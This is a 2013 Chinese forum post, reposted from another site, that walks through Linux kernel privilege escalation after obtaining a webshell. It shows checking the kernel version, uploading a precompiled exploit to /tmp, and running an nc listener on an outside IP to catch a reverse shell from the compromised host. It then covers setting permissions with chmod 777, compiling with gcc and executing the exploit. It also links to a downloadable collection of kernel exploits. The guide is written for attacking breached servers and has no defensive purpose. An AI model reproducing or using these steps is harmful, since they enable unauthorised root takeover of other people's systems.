服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

dirtysea 发表于 2013-5-17 14:44:12

简单详细的linux提权方法【附:收集的N多linux内核exp】

拿到webshell了,准备提权.我们首先要看下linux的内核信息
http://www.kanwangluo.com/zb_users/upload/2013/3/2013030462139453.jpg

2.6.18-194.11.3.el5 内核 2010的,这个CentOS release 5.5http://www.kanwangluo.com/zb_users/upload/2013/3/2013030462253657.jpg

然后百度或者其它路径(国外漏洞发布站)找EXP,2.6.18-194这个内核我已经收藏过.上传到/tmp,为什么要传到这个目录呢?
因为tmp目录一般都可写可执行.
找个外网IP 监听12666,当然12666也可以改。我这里用NC监听nc -l -n -v -p 12666
http://www.kanwangluo.com/zb_users/upload/2013/3/2013030462378453.jpg
然后再shell里执行下连接
http://www.kanwangluo.com/zb_users/upload/2013/3/2013030462415969.jpg
连接成功就出现下面的内容
http://www.kanwangluo.com/zb_users/upload/2013/3/2013030462434157.jpg
然后我们**/tmp目录
cd /tmp**到tmp目录了,看下我们之前上传的2.6.18-194
http://www.kanwangluo.com/zb_users/upload/2013/3/2013030462490517.jpg
我这里有权限rwx,可读可写可执行.如果没有权限chmod -R 777 文件名
我这里的exp已编译过了,直接执行溢出就ok了 ./2.6.18-194
要是你的exp没有编译gcc -o /tmp/文件名 /tmp/文件名.c ,自己编译下就行了
成功了
http://www.kanwangluo.com/zb_users/upload/2013/3/2013030462560421.jpg
其实linux提权还是很简单,关键看有没exp
这里是我收集的很多linux内核exp
http://pan.baidu.com/share/link?shareid=152619&uk=1663680644

其它EXP源码:
http://www.exploit-db.com/exploits/5093/


转自:http://www.kanwangluo.com/post/31.html

页: [1]
查看完整版本: 简单详细的linux提权方法【附:收集的N多linux内核exp】